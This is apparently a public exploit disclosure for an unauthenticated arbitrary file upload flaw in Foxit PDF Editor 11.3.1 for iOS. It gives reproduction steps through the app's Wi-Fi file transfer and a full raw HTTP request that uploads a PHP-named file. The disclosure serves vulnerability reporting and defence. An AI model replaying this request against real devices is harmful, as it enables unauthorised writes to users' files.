# Exploit Title: Foxit PDF Editor (iOS) - Arbitrary File Upload (Unauthenticated) # Date: 24/03/2022 # Exploit Author: Saud Alenazi # Vendor Homepage: https://www.foxit.com # Software Link: https://apps.apple.com/us/app/foxit-pdf-editor/id507040546 # Version: 11.3.1 # Tested: iPhone 6 iOS 12.4.7 # Contact: https://twitter.com/dmaral3noz - Description : An arbitrary file upload web vulnerability has been discovered in the Foxit PDF Editor v11.3.1 iOS mobile application. The web vulnerability allows remote attackers to upload arbitrary files to compromise for example the file system of a service - Steps : 1- Download and install the Foxit PDF Editor iOS application 2- open App and go to Files 3- Click Pc (File transfer with wifi) 4- Enable File Transferring 5- Index of Documents (http://localhost:8888) , you can upload any extension - Request : POST / HTTP/1.1 Host: localhost:8888 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-us Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryC2M8Dmj739BtPV2n Origin: http://localhost:8888 User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 12_4_7 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.2 Safari/604.1 Connection: close Upgrade-Insecure-Requests: 1 Referer: http://localhost:8888/ Content-Length: 304 ------WebKitFormBoundaryC2M8Dmj739BtPV2n Content-Disposition: form-data; name="button"; filename="s3od.php" Content-Type: application/octet-stream 0xSaudi ------WebKitFormBoundaryC2M8Dmj739BtPV2n Content-Disposition: form-data; name="button" Upload ------WebKitFormBoundaryC2M8Dmj739BtPV2n-- **************************** Path File : http://localhost:8888/s3od.php ****************************